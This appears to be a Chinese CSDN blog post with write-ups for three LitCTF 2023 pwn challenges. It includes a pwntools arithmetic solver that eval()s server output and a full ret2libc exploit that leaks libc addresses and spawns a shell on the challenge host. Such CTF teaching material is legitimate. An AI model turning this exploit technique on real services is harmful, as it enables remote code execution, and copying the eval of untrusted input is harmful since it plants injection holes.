LitCTF PWN题解

最新推荐文章于 2024-05-12 11:14:01 发布
最新推荐文章于 2024-05-12 11:14:01 发布
阅读量513 收藏
点赞数
分类专栏: pwn 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ctfpwn/article/details/130997926
版权

1.[LitCTF 2023]只需要nc一下~

 直接nc之后ls查看一下目录,看到一个dockerfile,cat一下就能发现打开flag文件的方式

输入echo $flag拿到flag。

2.[LitCTF 2023]口算题卡

nc之后发现想让我们做100道100以内加减运算,直接口算就行了(雾)。

下面是脚本:

from pwn import*

s = lambda buf: io.send(buf)
sl = lambda buf: io.sendline(buf)
sa = lambda delim, buf: io.sendafter(delim, buf)
sal = lambda delim, buf: io.sendlineafter(delim, buf)
r = lambda n=None: io.recv(n)
ra = lambda t=tube.forever: io.recvall(t)
ru = lambda delim: io.recvuntil(delim)
rl = lambda: io.recvline()
rls = lambda n=2**20: io.recvlines(n)
su = lambda buf,addr: io.success(buf + "==>" + hex(addr))

io = remote("node4.anna.nssctf.cn",28789)
i = 0
while i<100:
    try:
       if i == 0:
           ru("n!\n")
           p = rl()
           equation = p[8:-2] 
           pay = eval(equation)
           print(equation)
           print(pay)
           sl(str(pay))
           i+=1
       else:
            ru("t!\n")
            p = rl()
            equation = p[8:-2] 
            pay = eval(equation)
            print(equation)
            print(pay)
            sl(str(pay))
            i+=1
    except Exception as e:
        print("Exception occurred:", e)
        break
io.interactive()
 

 运行效果:

 

 3.[LitCTF 2023]狠狠的溢出涅~

出题人你是懂的~

咳咳,接下来是正题。先把原件checksec一下:

然后放到ida里看看:

看看c伪代码,很容易看出是ret2libc题,并且对read读入的数据有一个strlen的判断,如果大于0x50就跳出。

strlen好办,只要在填充数据时在不超过0x50的地方加一个\x00绕过就OK了;

接下来就是正常的64位ret2libc过程,找一个pop寄存器和ret地址,用这条指令:ROPgadget --binary pwn --only 'pop|ret'

这里我们选用pop_rdi,然后构造rop链泄露puts函数的地址并返回main函数,构造如下:

payload1 = b"\x00".ljust(0x68,b'a') + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(0x4006B0)

 然后通过给的libc文件计算偏移,得到system函数和/bin/sh字符串的地址。

完整exp:

from pwn import *
from LibcSearcher import *

context.log_level = "debug"
io = remote('node5.anna.nssctf.cn',28128)
elf = ELF('./pwn4')
libc = ELF('./libc-2.31.so')
pop_rdi_ret = 0x4007d3 
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
ret_addr = 0x400556 

payload1 = b"\x00".ljust(0x68,b'a') + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(0x4006B0)

io.sendlineafter('message:\n',payload1)

#puts_addr = u64(io.recv(6).ljust(8,b"\x00"))
puts_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))

#libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.sym["puts"]
system = libc_base + libc.symbols['system']
binsh = libc_base+next(libc.search(b"/bin/sh\x00"))
#binsh = libc_base + libc.dump('str_bin_sh')
print(hex(system))
print(hex(binsh))
payload2 = b"\x00".ljust(0x68,b'a') + p64(ret_addr) + p64(pop_rdi_ret) +p64(binsh) + p64(system) #

io.sendlineafter('message:\n',payload2)
io.interactive()
 

 运行效果如下:

 拿到shell

 

 

rbp
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
CTF pwn题堆入门 -- Unsorted bin
lifanxin的博客
04-08 3145
Unsorted bin概述攻击方式泄露libc地址总结 概述   Unsorted bin也是堆题中常见的,当一个堆块被释放时,且该堆块大小不属于fast bin(libc-2.26之后要填满tcache),那么在进入small bin和large bin之前,都是先加入到unsorted bin的。之后当我们再次分配内存到unsorted bin上寻找时,如果申请的内存堆块小于寻找的unsorted bin,那么会将该内存块切割后返回给用户,剩下的仍然保存在unsorted bin上;如果申请的内存堆块
2020MRCTF - 部分Pwn
weixin_44864859的博客
04-09 322
easyoverflow 保护全开,但这里只需要栈溢出覆盖数据满足check函数判断就好了。 exp: from pwn import * context.log_level = 'debug' p = remote('38.39.244.2',28082) payload="a"*48 + "n0t_r3@11y_f1@g" p.sendline(payload) p.interacti...
LitCTF 2023 只需要nc一下~
2301_79793667的博客
12-11 496
首先打开环境,发现并没有附件,可能真的如题目所说,只需要nc。发现env可以直接查看,flag也映入眼帘。那我们就进行nc连接看一下。
CTF-PWN学习-为缺少指导的同学而生_ctf pwn(1)
2401_84970145的博客
05-12 1053
CTF中PWN题型通常会直接给定一个已经编译好的二进制程序,然后参赛选手通过对二进制程序进行逆向分析和调试来找到利用漏洞,并编写利用代码发送playload,通过远程代码执行来达到攻击的效果,最终拿到目标机器的shell(控制台权限)来夺取flag。:常为C、C++及python写的一段程序,程序中往往包含着这样那样的漏洞。:利用反汇编等途径查看源代码并对程序进行理解的过程**调试:**程序调试是指通过分析和排查程序中的错误和问题,以找出程序运行过程中的错误和异常,并进行修复和优化的过程。
BUUCTF PWN 刷题 1-15题
农夫果园好好喝的博客
08-21 2033
经典栈溢出漏洞。
swpuctf2019 Login pwn详细题解
seaaseesa的博客
12-09 1650
Login 这是swpuctf2019的第二道pwn题,主要考点就是非栈上的字符串格式化漏洞利用。 首先,我们检查一下程序的保护机制 PIE和RELRO没有开启,那么我们可以轻易的利用漏洞修改GOT表 我们用IDA分析一下 在这里,有一个明显的格式化字符串漏洞,由于s1不是在栈上,而是在bss段里,所以漏洞利用起来会比栈上的字符串格式化漏洞稍微繁琐一些。由于外层是一个死循环,所以...
pwn栈溢出基础练习题——2
qq_41696518的博客
07-06 297
pwn栈溢出练习,所有题目在练习题——1中
2024NKCTF-pwn
03-25
2024NKCTF_pwn
welpwn pwn 入门题
02-11
pwn 入门题
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
[LitCTF 2022]--pwn部分wp
qq_51548306的博客
05-15 220
ret2libc这题由于靶机问题,暂时无法复现本题nc链接上靶机以后,是个docker镜像题,可惜它并没有考到这个,我们只需env查看环境变量或者echo $FLAG即可。
”BUUCTF之pwn题解(一些栈题+程序分析)
热门推荐
swedsn
01-13 1万+
文章目录前言一、test_your_nc二、rip2.读入数据总结 前言 萌新的总结(包含当时做题的全过程),方便以后查看。有什么不对的望各位大佬指点。 一、test_your_nc 1.直接nc(nc+的ip+端口号)。这里是直接进入了对方的shell命令中(有些题目是直接进入对方的文件并不会进入对方的shell中)。接下来就是和操作自己的shell一样的,ls查看目录,cat查看文件flag。 相互连接 二、rip 1使用IDA打开文件,先找main函数,然后按F5查看伪代码。看wp说fun可疑,点进
CTF-记一次PWN练习
小王的技术库
08-10 967
在CTF中PWN题型通常会直接给定一个已经编译好的二进制程序(Windows下的EXE或者Linux下的ELF文件等),然后参赛选手通过对二进制程序进行逆向分析和调试来找到利用漏洞,并编写利用代码,通过远程代码执行来达到溢出攻击的效果,最终拿到目标机器的shell夺取flag。try again.的提示信息,请对pwn1程序进行逆向分析和调试,找到程序内部的漏洞,并构造特殊的输入数据,使之输出Congratulations,
学习笔记:buuctf pwn
RookieMOR的博客
06-18 452
学习笔记,有不对的请大家指出
ACTF出题(dropper+master_of_dns)
qq_36386435的博客
07-03 2134
ACTF2022出题(dropper+master_of_dns)
LitCTF2023 Reverse 题解及复现
OrientalGlass的博客
05-14 2307
使用解包工具时要注意环境问题,这题是python3.8编写的,所以要用python3.8的环境,否则会缺少输出文件,建议使用anaconda管理python版本。关键代码是最后一段对flag的操作,不过这里可能是有意为之或者是反编译的问题,意思应该是flag[i]和flag[i+1]的数据异或后互换。经典的base64换表,第10和11行作用重复,12行也没有实际作用,此处的base表根本没有变化。关键就在于Probee代码中调用了check函数,该函数定义在ch中,分析程序逻辑不难写出解题脚本。
pwn】未知libc版本利用的一个蠢方法
Nothing
08-17 1395
前几天看了一道题,题目本身还是比较常规的,这题的预期解法是通过_dl_runtime_resolve来做的。但我就是想用栈溢出+栈迁移碰一碰,整了半天就差onegadget地址了,查了一下libc search发现找不到对应的版本,可能出题人就是想用一个比较偏的libc版本把这条路封死,但我最后还是硬怼出来了。以后如果遇到了数据库中找不到对应的libc版本的时候可以尝试一下这种方法(当然ctf题中一般不会出个很偏的libc版本)。 条件:1.libc中的一个任意地址(通过泄露got表就可得到)。2.可以通过
pwn hacknote
最新发布
05-21
HackNote 是一道非常经典的 pwn 题目,其难度较为适中,适合初学者进行练习。其主要思路是通过堆溢出来实现 getshell。具体来说,HackNote 程序是一个笔记本程序,能够添加、查看和删除笔记,其中笔记的信息都是存储在堆上的。而利用堆溢出漏洞,我们可以实现任意地址写,从而获得程序的控制权,最终得到 shell。 如果您想深入了解 pwn 的相关知识,可以参考一些比较经典的 pwn 教程,比如《pwn入门到进阶》、《Pwn入门到实战》等。如果您对 HackNote 题目感兴趣,可以在一些在线平台上进行尝试,比如 Pwnable.kr 等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值